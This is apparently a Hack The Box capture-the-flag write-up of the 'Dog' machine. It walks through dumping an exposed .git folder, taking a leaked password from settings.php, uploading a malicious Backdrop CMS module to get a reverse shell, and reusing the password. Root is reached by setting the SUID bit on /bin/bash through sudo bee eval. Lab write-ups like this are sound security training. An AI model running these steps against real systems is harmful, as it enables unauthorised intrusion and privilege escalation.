Hackthebox: Dog

Overview

Dog is an easy-difficulty linux machine from Hack The Box dealing initially with an exposed .git folder leaking user credentials that’ll allow us to exploit an Authenticated RCE vulnerability on a Backdrop CMS instance to get user. As for root, we’ll abuse bee to execute commands as root granting us system access.

Dog-info-card

Reconnaissance

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.12 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 97:2a:d2:2c:89:8a:d3:ed:4d:ac:00:d2:1e:87:49:a7 (RSA)
|   256 27:7c:3c:eb:0f:26:e9:62:59:0f:0f:b1:38:c9:ae:2b (ECDSA)
|_  256 93:88:47:4c:69:af:72:16:09:4c:ba:77:1e:3b:3b:eb (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-generator: Backdrop CMS 1 (https://backdropcms.org)
|_http-title: Home | Dog
| http-git:
|   10.10.11.58:80/.git/
|     Git repository found!
|     Repository description: Unnamed repository; edit this file 'description' to name the...
|_    Last commit message: todo: customize url aliases.  reference:https://docs.backdro...
| http-robots.txt: 22 disallowed entries (15 shown)
| /core/ /profiles/ /README.md /web.config /admin
| /comment/reply /filter/tips /node/add /search /user/register
|_/user/password /user/login /user/logout /?q=admin /?q=comment/reply
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 40.60 seconds

For this machine we’ve got our usual ssh 22 port and a web application deployed on port 80. We can also see from the nmap scan that the .git directory is exposed so we can download it and check what it has for us.

Web application - .git directory

In order to download the .git folder, we can use https://github.com/lijiejie/GitHack :

┌──(kali㉿kali)-[~/GitHack]
└─$ python3 GitHack.py http://10.10.11.58/.git
[+] Download and parse index file ...
[+] LICENSE.txt
[+] README.md
[+] core/.jshintignore
[+] core/.jshintrc
[+] core/authorize.php
[+] core/cron.php
[+] core/includes/actions.inc
[+] core/includes/ajax.inc
[+] core/includes/anonymous.inc
[+] core/includes/archiver.inc
[+] core/includes/authorize.inc
[+] core/includes/batch.inc
[+] core/includes/batch.queue.inc
[+] core/includes/bootstrap.classes.inc
[+] core/includes/bootstrap.inc
[+] core/includes/cache-install.inc
[+] core/includes/cache.inc
[+] core/includes/color.inc
[+] core/includes/common.inc
[+] core/includes/config.inc
[+] core/includes/database/charset_converter.inc
[+] core/includes/database/database.inc
[+] core/includes/database/log.inc
[+] core/includes/database/mysql/database.inc
[+] core/includes/database/mysql/install.inc
[+] core/includes/database/mysql/query.inc
[+] core/includes/database/mysql/schema.inc
[+] core/includes/database/prefetch.inc
[+] core/includes/database/query.inc
[+] core/includes/database/schema.inc
[+] core/includes/database/select.inc
<snip>

Checking the settings.php file, we can find some credentials: root:BackDropJ2024DS2024

I tried logging in with these credentials on the main web app but it did not work. So looking more into the source code, I found a tiffany username under core/modules/simpletest/tests/database_test.test. We can use that to login:

Web Application

Looking a bit into the web app, we can see it is Backdrop CMS. Looking for exploits for that version, I stumbled upon this one: https://www.exploit-db.com/exploits/52021 which is an Authenticated RCE vulnerability.

This exploit will generate us a malicious module to upload to the CMS, I updated the shell.php to a php reverse shell script.

Change the zip file to a tar.gz file, go to “functionality => “install module” -> “manual installation” and then navigate to http://dog.htb/modules/shell/shell.php and you will trigger the shell:

$ rlwrap nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.16.11] from (UNKNOWN) [10.10.11.58] 33272
Linux dog 5.4.0-208-generic #228-Ubuntu SMP Fri Feb 7 19:41:33 UTC 2025 x86_64 x86_64 x86_64 GNU/Linux
 11:35:59 up 17:34,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ 

Now checking /etc/passwd file to get to know more users, we find johncusack:

$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
fwupd-refresh:x:111:116:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
usbmux:x:112:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
sshd:x:113:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
jobert:x:1000:1000:jobert:/home/jobert:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
mysql:x:114:119:MySQL Server,,,:/nonexistent:/bin/false
johncusack:x:1001:1001:,,,:/home/johncusack:/bin/bash
_laurel:x:997:997::/var/log/laurel:/bin/false

I attempt to reuse the initial password again and it works:

$ su johncusack
Password: BackDropJ2024DS2024
id
uid=1001(johncusack) gid=1001(johncusack) groups=1001(johncusack)

And we can now claim the user flag:

$ cat user.txt
5759b90c262dada0e8db13f656ff1184

Privilege Escalation - /usr/local/bin/bee abuse

Now checking what we can run as sudo:

johncusack@dog:~$ sudo -l
[sudo] password for johncusack: 
Matching Defaults entries for johncusack on dog:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User johncusack may run the following commands on dog:
    (ALL : ALL) /usr/local/bin/bee

Bee is a command line utility for Backdrop CMS. It includes commands that allow developers to interact with Backdrop sites, performing actions, etc.

We can abuse bee by trying execute a shell_exec call that sets the SetUID bit on /bin/bash, effectively turning it into a root shell:

johncusack@dog:~$ sudo /usr/local/bin/bee --root=/var/www/html eval "echo shell_exec('chmod u+s /bin/bash');"
johncusack@dog:~$ ls -al /bin/bash
-rwsr-xr-x 1 root root 1183448 Apr 18  2022 /bin/bash
johncusack@dog:~$ bash -p
bash-5.0# id
uid=1001(johncusack) gid=1001(johncusack) euid=0(root) groups=1001(johncusack)
bash-5.0# cat /root/root.txt
975924a3d562f43106dc4b5bc6e19818

And that was it for Dog. Nice and easy :)
-0xkujen